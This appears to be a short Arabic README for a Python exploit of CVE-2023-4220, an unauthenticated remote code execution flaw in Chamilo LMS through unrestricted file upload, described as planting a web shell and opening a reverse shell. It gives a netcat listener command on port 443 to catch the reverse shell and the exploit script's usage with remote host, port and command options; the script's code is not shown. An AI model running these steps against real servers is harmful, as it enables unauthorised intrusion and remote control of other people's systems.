
استغلال Python لثغرة CVE-2023-4220، وهي ثغرة تنفيذ كود عن بُعد بدون مصادقة في Chamilo LMS عبر رفع ملفات غير مقيد، مما يتيح نشر شيل ويب وفتح صدفة عكسية.
sudo nc -lnvp 443
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>